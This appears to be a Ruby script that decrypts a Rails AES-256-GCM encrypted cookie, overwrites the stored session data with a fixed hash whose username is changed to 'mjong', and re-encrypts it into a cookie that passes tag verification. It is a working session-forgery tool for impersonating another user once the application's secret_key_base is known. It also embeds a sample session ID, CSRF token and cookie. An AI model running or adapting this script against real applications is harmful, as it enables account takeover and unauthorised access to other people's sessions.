|
require 'base64' |
|
require 'openssl' |
|
require 'uri' |
|
require 'json' |
|
require 'pry' |
|
require 'cgi' |
|
#cookie = "aDkxgmW4kaxoXBGnjxAaBY7D47WUOveFdeai5kk2hHlYVqDo7xtzZJup5euTdH5ja5iOt37MMS4SVXQT5RteaZjvpdlA%2FLQi7IYSPZLz--2A6LCUu%2F5AsLfSez--QD%2FwiA2t8QQrKk6rrROlPQ%3D%3D" |
|
# Cookie value to process, taken from the first command-line argument.
# It is URL-unescaped later, so it is expected in its escaped form.
cookie = ARGV.first
|
|
|
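# Decrypts a Rails-style AES-256-GCM cookie, replaces the serialized message
# with a fixed hash, and re-encrypts the envelope under the same derived key.
#
# The cookie is `data--iv--auth_tag`, each part strict Base64 and the whole
# value URL-escaped. The key is PBKDF2-HMAC-SHA1 over secret_key_base with the
# salt "authenticated encrypted cookie" and 1000 iterations.
#
# Security note: the only thing protecting such a cookie is the secrecy of
# secret_key_base. Whoever holds it can decrypt the cookie and produce a new
# one that passes tag verification, so the key must stay out of source control
# and be rotated if it is ever exposed.
#
# @param cookie [String] URL-escaped cookie value
# @return [String] re-encrypted `data--iv--auth_tag` blob (not URL-escaped)
# @raise [ArgumentError] if a part is missing, is not strict Base64, or the
#   authentication tag is not 16 bytes long
# @raise [OpenSSL::Cipher::CipherError] if the authentication tag does not verify
def decrypt_and_encrypt_cookie(cookie)
  # URI.unescape was removed in Ruby 3.0. CGI.unescape additionally maps "+"
  # to a space, so literal plus signs are protected first to keep the old
  # "decode %XX only" behaviour.
  cookie = CGI.unescape(cookie.gsub('+', '%2B'))

  data, iv, auth_tag = cookie.split('--').map { |part| Base64.strict_decode64(part) }

  # OpenSSL accepts truncated GCM tags, so the length has to be checked by the
  # caller; this also rejects cookies with fewer than three parts.
  if data.nil? || iv.nil? || auth_tag.nil? || auth_tag.bytesize != 16
    raise ArgumentError, 'cookie must be data--iv--auth_tag with a 16-byte auth tag'
  end

  decipher = OpenSSL::Cipher.new('aes-256-gcm')

  # Compute the encryption key once; it is reused for re-encryption below.
  # The original `'' || Rails.application.secret_key_base` always evaluated to
  # '' because an empty String is truthy in Ruby, so the fallback was dead code.
  # Key material belongs in the environment or a secrets store, not in source
  # or in comments.
  secret_key_base = ''
  secret = OpenSSL::PKCS5.pbkdf2_hmac_sha1(
    secret_key_base, 'authenticated encrypted cookie', 1000, decipher.key_len
  )

  # Set up the cipher for decryption; the tag must be set before #final.
  decipher.decrypt
  decipher.key = secret
  decipher.iv = iv
  decipher.auth_tag = auth_tag
  decipher.auth_data = ''

  # #final raises OpenSSL::Cipher::CipherError when the tag does not verify.
  plaintext = decipher.update(data) + decipher.final
  cookie_payload = JSON.parse(plaintext)
  # => {"_rails"=>{"message"=>"InRva2VuIg==", "exp"=>nil, "pur"=>"cookie.remember_token"}}

  puts "original_cookie : #{cookie_payload}"
  3.times { puts "\n" }

  # Decode the Base64-encoded stored data
  stored_value = JSON.parse(Base64.decode64(cookie_payload['_rails']['message']))

  puts "original_message : #{stored_value}"
  3.times { puts "\n" }

  # The decoded value is only printed above; the message written back is this
  # fixed hash, exactly as in the original script.
  stored_value = {
    "session_id" => "f67bc204b8777bfed362a4e785b977f9",
    "_csrf_token" => "CKQhzAg1RpEENcxJuYwveQVYBqMPqPqy0Z//7hvvZQQ=",
    "username" => "ankit",
    "expiry_timestamp" => 1635577737,
    "password_expiry_timestamp" => 163753633,
    "auth_method" => 'db'
  }
  stored_value['username'] = 'mjong'

  new_message = stored_value
  puts "new_message: #{new_message}"

  cookie_payload['_rails']['message'] = Base64.strict_encode64(new_message.to_json)
  new_cookie = cookie_payload

  puts "new_cookie_payload: #{new_cookie}"
  3.times { puts "\n" }

  encipher = OpenSSL::Cipher.new('aes-256-gcm')
  encipher.encrypt
  encipher.key = secret
  # A GCM nonce must never be reused with the same key for a different
  # plaintext; the original re-used the incoming cookie's IV here.
  fresh_iv = encipher.random_iv
  encipher.auth_data = ''

  encrypted_data = encipher.update(new_cookie.to_json) + encipher.final

  [encrypted_data, fresh_iv, encipher.auth_tag]
    .map { |part| Base64.strict_encode64(part) }
    .join('--')
end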
|
|
|
# Re-encrypt the cookie, URL-escape the result so it matches the form the
# input was given in, and print it followed by three blank lines.
cookie = CGI.escape(decrypt_and_encrypt_cookie(cookie))
puts "new : #{cookie}"
3.times { puts "\n" }
|
|
|
#decrypt_and_encrypt_cookie(cookie) |